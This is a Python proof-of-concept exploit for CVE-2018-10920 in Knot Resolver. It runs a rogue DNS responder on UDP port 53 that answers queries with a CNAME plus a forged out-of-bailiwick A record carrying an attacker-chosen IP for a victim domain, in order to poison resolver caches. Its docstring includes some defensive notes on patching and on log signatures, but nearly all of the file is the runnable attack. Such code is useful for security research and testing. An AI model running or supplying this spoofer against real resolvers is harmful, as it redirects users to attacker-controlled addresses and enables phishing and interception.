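#!/usr/local/bin/python3.6
# CVE-2018-10920 exploit.
# DO NOT ABUSE !!!
"""Proof of concept for CVE-2018-10920 (Knot Resolver cache poisoning).

The script runs a small authoritative-style DNS responder on UDP/53.  For an
A query it replies with a CNAME from the queried name to ``vic_name`` and
bundles an A record for ``vic_name`` carrying ``fakeip``.  That bundled record
belongs to a name outside the one that was queried; a resolver that does not
apply bailiwick checks to such additional data caches it, which is the defect
tracked as CVE-2018-10920 (the 1997 "Kashpureff" poisoning shape).

Defensive notes: the remedy is to run a Knot Resolver release that carries the
fix for this CVE (a patched resolver discards the out-of-bailiwick record and
resolves ``vic_name`` on its own).  In resolver or packet logs, the signature
of this class of poisoning is an answer whose A record arrives from a server
that is not authoritative for that record's name.

Code changes against the original listing: the UDP socket is held in a ``with``
block so it is closed when the loop is interrupted or a datagram fails to
parse, and the always-true ``__class__.__name__ == "DNSRecord"`` guard (with
its dead ``return None`` branch) was removed from ``craftPayload``.
"""
import socket
import sys

# pip install dnslib
from dnslib import RR, DNSHeader, DNSRecord, QTYPE, CNAME, NS, A


class KnotSpoofer():
    """UDP/53 responder that answers every query with :meth:`craftPayload`.

    ipaddr   -- local address to bind (the entry point passes "0.0.0.0").
    vic_name -- the name whose A record is forged; the usage text says it
                must be a sibling of the queried name.
    fakeip   -- the address placed into the forged A record.
    """

    def __init__(self, ipaddr, vic_name, fakeip):
        self.host = ipaddr
        # Plain DNS over UDP; binding this port needs elevated privileges.
        self.port = 53
        self.vic_name = vic_name
        self.fakeip = fakeip

    def run(self):
        """Serve forever, one reply per received datagram.

        Blocks until interrupted.  Any exception raised while parsing a
        datagram propagates out of the loop; the ``with`` block guarantees
        the socket is released in that case.
        """
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            sock.bind((self.host, self.port))
            print("[+] KnotSpoofer Started.")
            while True:
                msg, (cliHost, cliPort) = sock.recvfrom(8096)
                print(" [+] Received DNS Packet. Client:" + str(cliHost) + ":" + str(cliPort))
                responseData = self.craftPayload(msg)
                # craftPayload always returns bytes here; the None check is
                # kept so a subclass may still suppress a reply by returning None.
                if responseData is not None:
                    sock.sendto(responseData, (cliHost, cliPort))

    def craftPayload(self, msg):
        """Build the wire-format reply for one raw query datagram.

        msg -- the query as received from the socket (bytes).
        Returns the packed reply (bytes).  Raises if ``msg`` does not parse
        as a DNS message; the caller does not catch that.

        Only two query types get answer records; anything else receives an
        empty reply:
        * NS  -> one NS record naming ``ns.<qname>`` with TTL 60.
        * A   -> a CNAME from ``qname`` to ``vic_name`` (TTL 60) plus an A
                 record for ``vic_name`` (TTL 86400) holding ``fakeip``.
                 The A record is for a name other than the one queried; a
                 resolver with proper bailiwick checking ignores it.
        """
        query = DNSRecord.parse(msg)
        response = query.reply()
        qname = query.q.qname
        vic_name = self.vic_name
        fakeip = self.fakeip

        if query.q.qtype == QTYPE.NS:
            print("[+] required NS record.")
            assert_ns = RR(qname, QTYPE.NS, ttl=60, rdata=NS("ns.%s" % qname))
            response.add_answer(assert_ns)
        elif query.q.qtype == QTYPE.A:
            print("[+] required any A record.")
            cnamerr = RR(qname, QTYPE.CNAME, ttl=60, rdata=CNAME(vic_name))
            fakea = RR(vic_name, QTYPE.A, ttl=86400, rdata=A(fakeip))
            response.add_answer(cnamerr)
            response.add_answer(fakea)

        # query.reply() always yields a DNSRecord, so the original
        # class-name guard could never fail; dump and pack unconditionally.
        print("[!] Debug: print reply data")
        print("===============================")
        print(response)
        print("===============================")
        return response.pack()


if __name__ == '__main__':
    print("-----------------------------------------------")
    print("Knot Reslver Kashpureff Exploit(CVE-2018-10920)")
    print("-----------------------------------------------")
    if len(sys.argv) < 3:
        print("[+] Usage: %s [victim.com.] [Fake A Record IPAddr]" % sys.argv[0])
        print("[!] You can inject only the sibling domain which the queried domain.")
        sys.exit()
    vic_name = sys.argv[1]
    fakeip = sys.argv[2]
    srv = KnotSpoofer("0.0.0.0", vic_name, fakeip)
    srv.run()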